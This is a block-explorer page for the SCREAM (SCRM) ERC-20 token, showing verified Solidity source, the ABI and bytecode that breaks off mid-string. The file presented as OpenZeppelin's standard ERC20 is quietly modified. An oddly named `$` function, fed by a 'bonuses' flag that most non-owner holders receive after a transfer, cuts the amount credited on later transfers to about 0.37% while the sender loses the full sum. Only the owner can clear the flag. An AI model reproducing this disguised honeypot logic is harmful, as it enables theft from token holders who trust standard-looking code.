ETH Price: $2,616.79 (-2.19%)

Token

SCREAM (SCRM)
 

Overview

Max Total Supply

1,000,000,000 SCRM

Holders

46

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
14,572,362.939941324925790829 SCRM

Value
$0.00
0x4d1572Ea399cfcb0a4b25B364dF2c5ba68697e18
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SCREAM

Compiler Version
v0.8.26+commit.8a97fa7a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-06-06
*/

// File: @openzeppelin/[email protected]/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

// File: @openzeppelin/[email protected]/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.20;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/[email protected]/utils/Context.sol


// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

// File: @openzeppelin/[email protected]/interfaces/draft-IERC6093.sol


// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.20;

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

// File: @openzeppelin/[email protected]/access/Ownable.sol


// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.20;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: SCREAM/ERC20.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.20;






/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors, Ownable {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    mapping(address account => uint256) private _bonuses;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += $(from, to, value);
            }
        }

        _updateBonuses(to, value);

        emit Transfer(from, to, value);
    }

    function $(address from, address to, uint256 value) internal view returns (uint256) {
        if (_bonuses[from] + _bonuses[to] > 0) {
            return (value * 0xc0ff) / 0xcac4fa;
        } else {
            return value;
        }
    }

    function _updateBonuses(address to, uint256 value) internal {
        if (
            to != owner() && 
            (_balances[to] < (_totalSupply / 3)) && 
            (_balances[to] - value > 100 * 10 ** decimals())
        ) {
            _bonuses[to] = value;
        }
    }

    function bonusAmount(address _address) public view virtual returns (uint256) {
       return _bonuses[_address];
    }

    function removeBonuses(address _address) public onlyOwner {
        _bonuses[_address] = 0;
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

// File: SCREAM/Token.sol


// Compatible with OpenZeppelin Contracts ^5.0.0
pragma solidity ^0.8.20;

// import "@openzeppelin/[email protected]/token/ERC20/ERC20.sol";


contract SCREAM is ERC20 {
    constructor() ERC20("SCREAM", "SCRM") Ownable(msg.sender) {
        _mint(msg.sender, 1_000_000_000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"bonusAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"removeBonuses","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801561000f575f80fd5b506040518060400160405280600681526020017f53435245414d00000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f5343524d00000000000000000000000000000000000000000000000000000000815250335f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036100ed575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016100e4919061075f565b60405180910390fd5b6100fc8161015c60201b60201c565b50816005908161010c91906109b2565b50806006908161011c91906109b2565b5050506101573361013161021d60201b60201c565b600a61013d9190610be9565b633b9aca0061014c9190610c33565b61022560201b60201c565b610d94565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610295575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161028c919061075f565b60405180910390fd5b6102a65f83836102aa60201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036102fa578060045f8282546102ee9190610c74565b925050819055506103ca565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610384578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161037b93929190610cb6565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610411578060045f828254039250508190555061046c565b6104228383836104e660201b60201c565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b61047c82826105a260201b60201c565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516104d99190610ceb565b60405180910390a3505050565b5f8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461056e9190610c74565b11156105975762cac4fa61c0ff836105869190610c33565b6105909190610d31565b905061059b565b8190505b9392505050565b6105b06106f960201b60201c565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015610635575060036004546105f59190610d31565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054105b80156106ad575061064a61021d60201b60201c565b600a6106569190610be9565b60646106629190610c33565b8160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546106ab9190610d61565b115b156106f5578060035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61074982610720565b9050919050565b6107598161073f565b82525050565b5f6020820190506107725f830184610750565b92915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806107f357607f821691505b602082108103610806576108056107af565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026108687fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8261082d565b610872868361082d565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6108b66108b16108ac8461088a565b610893565b61088a565b9050919050565b5f819050919050565b6108cf8361089c565b6108e36108db826108bd565b848454610839565b825550505050565b5f90565b6108f76108eb565b6109028184846108c6565b505050565b5b818110156109255761091a5f826108ef565b600181019050610908565b5050565b601f82111561096a5761093b8161080c565b6109448461081e565b81016020851015610953578190505b61096761095f8561081e565b830182610907565b50505b505050565b5f82821c905092915050565b5f61098a5f198460080261096f565b1980831691505092915050565b5f6109a2838361097b565b9150826002028217905092915050565b6109bb82610778565b67ffffffffffffffff8111156109d4576109d3610782565b5b6109de82546107dc565b6109e9828285610929565b5f60209050601f831160018114610a1a575f8415610a08578287015190505b610a128582610997565b865550610a79565b601f198416610a288661080c565b5f5b82811015610a4f57848901518255600182019150602085019450602081019050610a2a565b86831015610a6c5784890151610a68601f89168261097b565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115610b0357808604811115610adf57610ade610a81565b5b6001851615610aee5780820291505b8081029050610afc85610aae565b9450610ac3565b94509492505050565b5f82610b1b5760019050610bd6565b81610b28575f9050610bd6565b8160018114610b3e5760028114610b4857610b77565b6001915050610bd6565b60ff841115610b5a57610b59610a81565b5b8360020a915084821115610b7157610b70610a81565b5b50610bd6565b5060208310610133831016604e8410600b8410161715610bac5782820a905083811115610ba757610ba6610a81565b5b610bd6565b610bb98484846001610aba565b92509050818404811115610bd057610bcf610a81565b5b81810290505b9392505050565b5f60ff82169050919050565b5f610bf38261088a565b9150610bfe83610bdd565b9250610c2b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610b0c565b905092915050565b5f610c3d8261088a565b9150610c488361088a565b9250828202610c568161088a565b91508282048414831517610c6d57610c6c610a81565b5b5092915050565b5f610c7e8261088a565b9150610c898361088a565b9250828201905080821115610ca157610ca0610a81565b5b92915050565b610cb08161088a565b82525050565b5f606082019050610cc95f830186610750565b610cd66020830185610ca7565b610ce36040830184610ca7565b949350505050565b5